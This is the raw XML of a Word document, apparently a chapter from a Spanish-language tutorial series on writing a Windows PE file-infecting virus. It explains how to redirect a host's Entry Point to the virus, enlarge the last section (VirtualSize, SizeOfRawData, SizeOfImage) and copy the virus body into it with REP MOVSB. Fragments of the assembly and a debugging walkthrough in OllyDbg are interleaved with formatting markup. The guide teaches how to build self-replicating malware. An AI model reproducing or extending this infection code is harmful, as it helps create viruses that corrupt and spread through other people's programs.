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4</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 xml:space="preserve">En el capítulo anterior habíamos preparado la última sección del archivo a infectar modificándole sus características para que se pudiera leer y escribir y además que fuera ejecutable, ahora apuntaremos el Entry Point a la dirección de inicio del virus que se alojará al final de esta sección y luego copiaremos el mismo allí.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Entry Point es la dirección de la primera instrucción que se debe ejecutar en un programa, le indica al SO donde debe quedar apuntando el registro EIP cuando termina de cargar un programa para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e campo se encuentra en la cabecera PE opcional, con un desplazamiento de 10h lugares desde el inicio de la misma. Recordemos que dicho valor es un RVA, o sea que es relativo al inicio del ejecutable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hacer un alto en este punto para dejar en claro dos conceptos distintos relacionados a los programas y su ejecución que a veces es fácil de confundir, y que es muy importante que quede totalmente comprendido ya que es fundamental para entender lo que sigue de acá en má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que distinguir la diferencia entre un programa en disco y el mismo programa en memoria cuando se está ejecu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t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:object w:dxaOrig="5536"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222.85pt" filled="f" o:ole="">
            <v:imagedata r:id="rId3" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="" ShapeID="ole_rId2" DrawAspect="Content" ObjectID="_1069044031" r:id="rId2"/>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un lado tenemos que el inicio y tamaño de cada sección dentro del programa es distinta si este está en el disco o si está en ejecución, básicamente esto está dado por la dirección donde se deberá ubicar en memoria (VirtualAddress) y por el tamaño especificado de la misma (VirtualSize), además de los alineamientos tanto de disco (FileAlignment) como de memoria (Section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es importante notar que el órden en que se encuentran las secciones en disco puede variar al cargarse en memoria si así se determina dentro de la cabecera PE modificando los valores de la Virtual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t>Tenemos que tener muy en cuenta esto ya que en este momento tenemos el programa a infectar mapeado en memoria, con lo cual lo estamos viéndolo tal cual se encuentra en disco, y cuando copiemos nuestro virus en el mismo también hay que tener esta visión en mente, pero para modificar el valor del Entry Point tenemos que imaginarlo ya en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olvamos a EP y veamos como modificarlo para que apunte al inicio de nuestro virus. Para esto tenemos que tener en cuenta dos valores de la sección que estamos modificando (en este caso la última del programa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Address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:  RVA de la sección con respecto a la base del host (ubicado en el inicio de la sección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SizeOfRawData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: tamaño de la sección alineada (ubicado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sumamos ambos valores obtenemos el punto de entrada al virus, recordemos que el mismo estará ubicado al final de los datos  de la última sección del programa víctima. </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esto en OllyDbg para que quede más claro, para esto abrimos el programa que hicimos en el primer taller que solamente utiliza un MessageBox (o cualquiera que elijan) y vamos a Memory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104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76" r="-33" b="-76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1104900" cy="4762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bicamos las tablas de secciones (ya vimos en el capítulo anterior cómo hacerlo) y nos posicionamos en la última (en este caso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0476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0" r="-7" b="-30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5104765" cy="11811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cemos doble click sobre la primer columna en la dirección de inicio de la sección para que muestre el resto de direcciones como desplazamientos relativos a esta y ahí vemos estos dos campos que mencionábamos anterior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07619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9" r="-7" b="-39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5076190" cy="933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s valores que tienen son 3000h (+Ch) y 200h (+10h) respectivamente, si los sumamos obtendremos 3200h. Ese es justamente el final de la sección y allí estará ubicado nuestro nuevo EP, y será el inicio del virus en memoria en el momento de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hacer esto es muy sencillo, recordemos que del paso anterior nos había quedado guardado el inicio de la sección en el registro EBX. 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si + 10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si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DX nos va a quedar el nuevo EP, ahora tenemos que modificar el valor en la cabecera PE para que al cargar el programa en memoria inicie la ejecución con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realizar esto es el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inicioHostMem]    ; eax = inicio del host mapeado en mem.</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i, [eax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ax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28h], edx                             ; cambio el valor del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Recordemos que en el capítulo anterior habíamos obtenido el Original Entry Point (OEP) y que lo habíamos guardado en la variable entryPoinOrig. Hago esta aclaración porque una vez que pisemos este valor en la cabecera del archivo host, va a comenzar la ejecución con el código de nuestro virus, pero una vez que termine este deberá devolverle la ejecución al host original y tendremos que saber a que dirección saltar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modificamos el programa para que inicie la ejecución con nuestro virus, ahora vamos a determinar la dirección donde comenzar a copiar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trabajar con el EP tuvimos en mente al host desde el punto de vista de la futura ejecución, ahora para copiar nuestro especímen tendremos que verlo desde el punto de vista del mismo en disco. Si ya sé es un lío por eso hay que tener bien clara la diferencia entre el programa en disco y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ásicamente lo que vamos a hacer es obtener la dirección donde termina la última sección para poder copiar a partir de ahí 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obtener este valor debemos sumar dos valores de la sección a infec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ointerToRawData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = offset (desplazamiento) de la sección en disco (lo encontramos en inicio sección + 14h)</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xml:space="preserve"> = tamaño de la sección en disco alineada (lo encontramos en inicio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calcular el EP habíamos tomado el valor de la "VirtualAddress" porque necesitábamos el offset pero en memoria, ahora en cambio necesitamos el offset de la sección pero en disco.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en esi tengo el inicio de la sección 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le sumo 10h y obtengo en ebx el SizeOfRawDat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bx, [esi + 14h]              ; le sumo el valor de PointerToRaw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bp + offset inicioHostMem]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UltimaSeccPE], ebx ; lo guardamos en una varia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pués de ejecutar esta rutina voy a obtener en la variable UltimaSeccPE la dirección donde termina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Lo que tenemos que hacer ahora es aumentar el tamaño de la sección para poder luego copiar nuestro virus allí. Hay que tener cuidado con el alineamiento ya que la sección deberá estar alineada con el campo File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vamos a profundizar demasiado con esto ya que la mecánica es la misma que utilizamos cuando tuvimos que alinear el archivo en memoria, en el capítulo 1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alizar esto tendremos que cambiar dos valores de la sección a modificar, recordemos que no estamos agregando una nueva, sino que estamos agrandando la última para que conteng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cambiar dos valores dentro de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Size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: solamente debemos sumarle el tamaño del virus (se encuentra en el inicio de la sección + 0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tenemos que sumarle el tamaño del virus pero teniendo en cuenta el FileAlignment (se encuentra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tendremos que guardar el valor del SizeOfRawData anterior que luego lo vamos a  utilizar para acomodar el valor de SizeOfImage en el pas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es muy sencillo, y lo vemos a continu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longVirus</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dd     [esi + 08h], eax             ; en esi tengo el inicio de la sección en memori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y en seccion + 08h la VirtualSize (ya incrementada)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SizeOfRawData antes de modificar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p + offset SizeOfRDAnt], ebx     ; la guard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longVirus               ; tamaño del viru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dd      eax, ebx                       ; le sumo la SizeOfRawData actual y asi obtengo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valor a redondear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ecc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ax                               ; si el resto es distinto de cero le suma un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ec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p + offset SizeOfRDNuevo], eax       ; guardo el nuevo valor d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izeOfRawData alinead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 10h], eax          ; cambio el valor del SizeOfRawData de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ta rutina no es muy complicada y además es similar a la que utilizamos en el capítulo 11 cuando cambiamos el tamaño de la sección, por lo que si se les complica les aconsejo repasar ese capítu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mos a ajustar el valor de SizeOfImage, el cual contiene el tamaño total del archivo alineado y representa la memoria que necesita reservar Windows cuando el programa es cargado por el loa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puede que sea muy aburrido, pero es necesario que dejemos ajustados todos estos valores para que luego no se nos cuelgue nuestro virus en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alor que debe tomar SizeOfImage surge de la suma de todas las cabeceras mas todas las secciones. Hay que tener en cuenta que este valor debe estar alineado con SectionAlignment (recordemos que ahora estamos trabajan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nuevo valor de SizeOfImage se puede obtener si al VirtualOffset de la última sección le sumamos el nuevo VirtualSize (original + tamaño del virus) y luego lo alin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irtualOffset se encuentra en seccion + 0Ch y el VirtualSize está en seccion + 08h como vimos hace un momento. El SizeOfImage que tenemos que modificar está ubicado en el inicio de la PE header + 5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ómo sería el código para hacer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si + 08h]                 ; eax = VirtualSiz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si + 0Ch]                 ; eax = VirtualSize + VirtualOffset</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izeOfI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nc     eax                                     ; si el resto es distinto de cero le suma uno a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valor ob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izeOfI:</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si, [ebp + offset inicioHostMem]       ; apuntamos al inicio del host mapeado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esi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si                            ; le sumo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 50h], eax               ; guardo la nueva SizeOfImage obtenid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pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bien ya tenemos todo listo, ahora vamos a copiar nuestro virus en el espacio creado al final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esto vamos a utilizar una combinación de dos instrucciones muy potentes que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rep y movsb, veamos un poco como funciona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REP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: esta instrucción va acompañada de otra y lo que hace es repetir dicho comando tantas veces como lo indique el registro ECX. También podríamos hacer un loop o ciclo que realice dicha tarea pero es más eficiente (y más claro) de esta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MOVSB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: esta instrucción se utiliza de la siguiente forma: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MOVSB destino,origen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y nos permite copiar un byte (por eso la B final, también podría ser W para word) desde un origen a un destino. El origen se lo indicamos con los registros DS:SI (Source Index o índice fuente) y el destino con ES:DI (Destination Index o índic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luego de realizar el movimiento de datos, SI y DI son incrementados para que apunten a la próxima dirección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t>Pasando esto en limpio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620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>ES:[DI] &lt;- DS:[SI] (un byte)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DI &lt;- DI+1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>SI &lt;- SI+1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-AR"/>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comandos para realizar la copia, ahora necesitare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si = origen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di = destino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cx = tamaño del virus</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o es todo, ya tenemos nuestro código copiado al final del host. Veamos como funciona todo esto en OllyDbg. Llevemos todo lo visto al código, compilemos y movamos el virus a un directorio donde tengamos varis copias intactas de nuetro programa a infectar que utilizamos siempre (el que muestra un mensaje por pantalla, siempre probamos con este por su sencillez asi no nos complicamos y podemos entender bien su funcion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 pequeño truco para encontrar rápidamente la sección de código donde queremos trabajar es agregarle unas cuantas instrucciones NOP para poder ubicarlas rápidamente en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una vez que tengamos todo listo cargamos el virus en el OllyDbg y localizamos los NOP´s que agregamos y ponemos un B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0936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0" r="-9" b="-40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3809365" cy="9048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amos con F9 y quedaremos parado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dentificamos la primer parte de nuestro virus que se encarga de calcular el nuevo entry point a partir de la última sección, carguemos en otro Olly el programa original y veamos est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amos a ‘Memory’ y vemos el PE Header y ubicamos la cebecera PE, a partir de ahí contamos 28h lugares y tendremos nuestro OEP (original entry point), que en este caso es 10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0946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609465" cy="16478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bajamos un poco y ubicamos las secciones, nos vamos a laúltima (que en este caso es la .data) y vemos los valores de VirtualAddress y del SizeOfRawData, que sumados nos darán el nuevo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9049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7" r="-7" b="-37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5190490" cy="9620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ste caso vale: 3000h + 200h =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con estos datos volvamos a nuestro virus y veamos como el programa modifica este valor. La primer parte de esta rutina se encarga de esto, y al llegar al final de la misma tendremos ese valor en EDX, el cual moveremos para sobreescribir el EP del host.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314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4" r="-10" b="-34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3533140" cy="1057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vemos su valor en los registros vemos que efectivamente vale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5716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3" r="-23" b="-43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1571625" cy="828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lo que sigue es simplemente para arreglar alineamientos asi que se los dejo para que lo vean ustedes, vamos a pasar al final donde realizamos la copia del virus en el host. Ubicamos esta rutina el el código y ejecutamos hasta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15226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2" r="-9" b="-102"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4152265" cy="352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imero cargamos en ESI la dirección de inicio de nuestro virus y en EDI la dirección donde termina la última sección del host, que será el destino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valor que necesitamos es la cantidad de bytes a copiar, o sea el tamaño de nuestro virus, esto ya vimos que lo obtenemos a través de una etiqueta que colocamos al inicio del mismo y otr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iniciovir:</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fin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restando amb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longVirus       equ finvir - iniciovir   ; tamaño del virus</w:t>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ejecutar esta rutina, veamos que hay en la dirección de memoria de destino, para ello nos paramos sobre el REP MOVSB y presionamos el botón derecho del mouse y seleccionamos la opción ‘Follow in Dump -&gt; First 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780915" cy="300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80915" cy="30092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vemos en el dump que está vacía (rellena de ce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7609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3" r="-8" b="-23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4276090" cy="1590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la dirección que muestra (en este caso 001D0A00) puede variar ya que es el lugar en memoria donde el SO mapeó nuestro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de una vez la instrucción con F8 y veamos que quedó en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4256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3" r="-13" b="-23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2742565" cy="1543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ómo sabemos si esto es correcto, fácil, nos vamos al inicio de la pantalla y vemos que los opcodes coinciden con las instrucciones de nuestro virus (E8 00 00 00 00 5D 81 ….)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7594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75940" cy="1133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eso es todo por ahora, solamente un par de recomendaciones: tenemos que tener cuidado cuando probemos nuestro virus ya que en cada ejecución (sobre todo si ejecutamos una parte y la dejamos) irá modificando los archivos víctimas que tengamos en nuestro directorio y si tratamos de reinfectarlo puede dar cualquier resultado y podemos rompernos la cabeza para descubrir porque algo no funciona como esperáb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cosa importante es que hay que tener en cuenta que cada vez que ponemos un BP se modifica el código en memoria por un valor 0CCh (como vimos en el capítulo 3) y aunque OllyDbg lo oculta para que veamos la dirección original este valor se copiará cuando hagamos el MOVSB. Esto es otra cosa que nos puede volver locos si no la tenemos en cuenta y luego no funciona correctamente el archivo infec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gamos una prueba rápida para probar esto último, recarguemos nuestro programa y verifiquemos que no tiene ningún BP, ahora pongamos un BP (con F2) en la segunda instruc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8566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7" r="-8" b="-97"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4685665" cy="371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en la instrucción de copia (REP MOVSB):</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43801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8" r="-8" b="-108"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4438015" cy="3333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con F9 hasta llegar al segundo BP y veamos donde se copiará como hicimos anteriormente con ‘Follow in Dump -&gt; First Address’. Luego presionamos F8 para ejecutar esta instrucción y veamos como queda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2846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39" r="-9" b="-39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4228465" cy="9144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ahí vemos que en vez de copiar el opcode original copió CC con lo cual el nuevo archivo infectado se ejecutará erróne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 importante ir teniendo en cuenta todos estos aspectos al igual que el tema de los alineamientos para que luego nuestro especímen funcione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eso es todo por ahora, sólo nos queda ver cómo le devolvemos la ejecución al host original luego de producida la infección y el ajuste de algunos valores que ayudarán al correcto funcionamiento del virus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sé que a veces repito varias veces algunas cosas pero es porque me parece importante que se comprenda bien su funcionamiento y además son las cosas que en su momento cuando empecé a ver este tema de los virus me resultaron más complic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09T18:16:00Z</dcterms:modified>
  <cp:revision>2753</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>